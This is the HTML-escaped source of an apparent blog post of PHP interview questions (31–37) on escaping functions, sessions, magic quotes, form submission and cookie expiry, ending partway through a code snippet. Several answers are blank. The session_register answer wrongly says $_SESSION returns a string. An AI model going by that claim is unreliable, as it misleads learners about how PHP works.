&lt;div style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; line-height: 18px; margin-bottom: 15px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;31 ) What’s the difference between htmlspecialchars and htmlentities ?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b style="font-family: Arial, Helvetica, sans-serif; line-height: 21px; text-align: left;"&gt;Ans:&lt;/b&gt;&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; line-height: 18px; margin-bottom: 15px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;32 ) What is Session and Cookie ?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b style="font-family: Arial, Helvetica, sans-serif; line-height: 21px; text-align: left;"&gt;Ans:&lt;/b&gt;&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; line-height: 18px; margin-bottom: 15px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;div style="background-color: white;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;33 ) What’s the difference between session_register and $_SESSION ?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="background-color: white; line-height: normal;"&gt;The very first main and simple difference is that session_register function returns boolean value and $_SESSION returns string value.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="background-color: white; line-height: normal;"&gt;The second will be session_register function doesn't work if register_global is disabled.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="background-color: white; line-height: normal;"&gt;But whereas $_SESSION works in both case whether register_global is disabled or enabled. So using $_SESSION for session variable manipulation is more appropriate.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="background-color: white;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; line-height: 18px; margin-bottom: 15px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;div style="background-color: white;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;34 ) What is magic quotes ? Is it on or off by default in PHP&amp;nbsp;5 ?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="line-height: normal;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="line-height: normal;"&gt;Magic Quotes is a process that automagically escapes incoming data to the&amp;nbsp;&lt;/span&gt;&lt;acronym style="line-height: normal;" title="PHP: Hypertext Preprocessor"&gt;PHP&lt;/acronym&gt;&lt;span class="Apple-style-span" style="line-height: normal;"&gt;&amp;nbsp;script.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="line-height: normal;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;It's preferred to code with magic quotes off and to i&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;nstead escape the data at runtime, as needed.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="background-color: white; line-height: normal;"&gt;Magic Quotes are depreciated and going to be removed in PHP6.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; line-height: 18px; margin-bottom: 15px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;35 ) What does __sleep and __wake do ?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b style="font-family: Arial, Helvetica, sans-serif; line-height: 21px; text-align: left;"&gt;Ans:&lt;/b&gt;&lt;br /&gt;
&lt;b style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;36 ) Can you submit a form without a submit button ?&lt;/b&gt;&lt;br /&gt;
&lt;b style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;Ans:&lt;/b&gt;&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="line-height: normal;"&gt;You can submit a form without a submit button, but it relies on javascript, which is a bad thing. How will you keep your pages working for those without javascript enabled?&lt;/span&gt;&lt;br style="line-height: normal;" /&gt;&lt;br style="line-height: normal;" /&gt;&lt;span class="Apple-style-span" style="line-height: normal;"&gt;Anyway, to submit the first form on your page, you can use something like this:&lt;/span&gt;&lt;br style="line-height: normal;" /&gt;&lt;br style="line-height: normal;" /&gt;&lt;span class="Apple-style-span" style="line-height: normal;"&gt;&lt;a href="http://draft.blogger.com/blogger.g?blogID=9099073570000665072#"&gt;submit&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;b style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;b style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;b style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;37 ) How can you set a cookie to expire after 30 minutes or so ?&lt;/b&gt;&lt;/div&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;b style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;Ans:&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; line-height: 18px; margin-bottom: 15px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;span class="Apple-style-span" style="line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="Apple-style-span" style="color: black; line-height: 18px;"&gt;30 minutes is&amp;nbsp;&lt;/span&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 1px; padding-left: 5px; padding-right: 5px; padding-top: 1px; text-align: left; vertical-align: baseline;"&gt;30 * 60 * 1000&lt;/code&gt;&lt;span class="Apple-style-span" style="color: black; line-height: 18px; text-align: left;"&gt;&amp;nbsp;miliseconds. Add that to the current date to specify an expiration date 30 minutes in the future.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; line-height: 18px; margin-bottom: 15px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;/div&gt;
&lt;pre class="default prettyprint" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; line-height: 18px; margin-bottom: 10px; max-height: 600px; overflow-x: auto; overflow-y: auto; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px; text-align: left; vertical-align: baseline; width: auto;"&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="kwd" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;var&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt; date &lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;=&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span class="kwd" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;new&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span class="typ" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Date&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;();&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;
&amp;nbsp;date&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;setTime&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;(&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;date&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;getTime&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;()&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;+&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;(&lt;/span&gt;&lt;span class="lit" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;30&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;*&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span class="lit" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;60&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;*&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span class="lit" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;1000&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;));&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;
&amp;nbsp;$&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;cookie&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;(&lt;/span&gt;&lt;span class="str" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;"example"&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;,&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span class="str" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;"foo"&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;,&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;{&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt; expires&lt;/span&gt;&lt;span class="pun" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;span class="pln" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 